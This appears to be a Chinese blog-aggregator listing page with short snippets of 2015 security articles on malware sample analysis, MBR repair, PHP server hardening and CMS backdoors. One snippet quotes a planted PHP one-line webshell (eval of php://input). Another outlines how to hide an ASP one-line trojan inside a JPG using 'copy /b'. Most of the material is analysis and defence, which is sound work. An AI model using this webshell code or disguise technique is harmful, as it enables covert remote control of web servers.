一、病毒样本简述
初次拿到样本 KWSUpreport_感染.exe.v 文件,通过使用PE工具,并不能辨别出该样本是那种感染类型,使用了一个比较直接的方法,从网上查资料,获取到了该样本的正常EXE文件的一些信息,资料表明:KWSUpreport.exe
是2009年版金山网盾程序的一个上传用户报告的程序模块,因此从网上下载了该版本的金山网盾程序,获取到了正常的KWSUpreport....
分类:
其他好文 时间:
2015-05-23 14:21:11
阅读次数:
158
一、 病毒样本基本信息
样本名称:kspoold.exe
样本大小: 285184 字节
样本MD5:CF36D2C3023138FE694FFE4666B4B1B2
病毒名称:Win32/Trojan.Spy.a5e
计算机系统中了该病毒一个比较明显的特征就是U盘里的.doc、.xls文件会被病毒隐藏起来,变成kspoold.exe病毒的载体文件,误导用户以为是原来的.d...
分类:
其他好文 时间:
2015-05-22 11:40:15
阅读次数:
135
原文地址:http://www.myhack58.com/Article/60/61/2013/37209.htm根据生产环境不断反馈,发现不断有PHP网站被挂木马,绝大部分原因是因为权限设置不合理造成。因为服务器软件,或是 php 程序中存在漏洞都是难免的,在这种情况下,如果能正确设置Linux网...
分类:
Web程序 时间:
2015-05-22 00:03:54
阅读次数:
234
在平时的生活中肯定有许多人遇到找不到引导程序,出现启动中断的现象,或者是无法加载操作系统,开机后出现黑屏现象等等。出现这些故障现象的原因大多是因为病毒、木马等造成的破环,或者是不正确的分区操作,以及磁盘读写的错误等。下面,就让我们针对这种MBR扇区故障进行修复..
分类:
其他好文 时间:
2015-05-21 19:48:56
阅读次数:
215
一、php://input一句话木马在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)@eval(file_get_contents('php://input'))我是个...
分类:
Web程序 时间:
2015-05-19 12:41:25
阅读次数:
164
模拟MBR扇区故障产生MBR扇区故障主要有以下两点原因:1、病毒、木马的入侵。2、不正确的分区操作和磁盘读写操作。MBR分区故障主要有以下两点现象:1、找不到引导程序,启动中断。2、无法加载操作系统,开机后黑屏模拟MBR扇区故障:将MBR进行备份打开桌面终端:使用fdisk–l命?.
分类:
其他好文 时间:
2015-05-19 10:56:39
阅读次数:
171
现象:开机后,没有explorer.exe 没有桌面。Explorer是UserInit程序创建,Windows启动过程1 输入账号密码后,WinLogon吧账号密码发给LSASS。2 LSASS验证,创建一个访问令牌对象。3 WinLogon启动HKLM\SOFTWARE\Microsoft\Wi...
分类:
其他好文 时间:
2015-05-16 11:49:52
阅读次数:
127
DedeCMS顽固木马后门专杀工具V2.0实现方式研究
分类:
其他好文 时间:
2015-05-13 00:36:27
阅读次数:
416
控制指令高达二十多种:远控木马Dendoroid.B分析报告IT社区推荐资讯 - ITIndex.net Apr 24近期,360团队截获了一款功能强大的专业间谍软件,它可以通过PC端远程控制中招用户的手机,控制指令高达二十多种,窃取用户手机通讯录,短信,照片及其它重要隐私数据。这个远控木马与去年知...
分类:
其他好文 时间:
2015-05-11 14:29:16
阅读次数:
216
主要亮点:图片木马(可以正常打开显示的木马)先看代码:仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。1、找一张图片,名字改成1.jpg2、存为1.asp(就是一句话木马)3、copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件注:以上三个文件放在同一目录...
分类:
其他好文 时间:
2015-05-06 10:34:51
阅读次数:
355
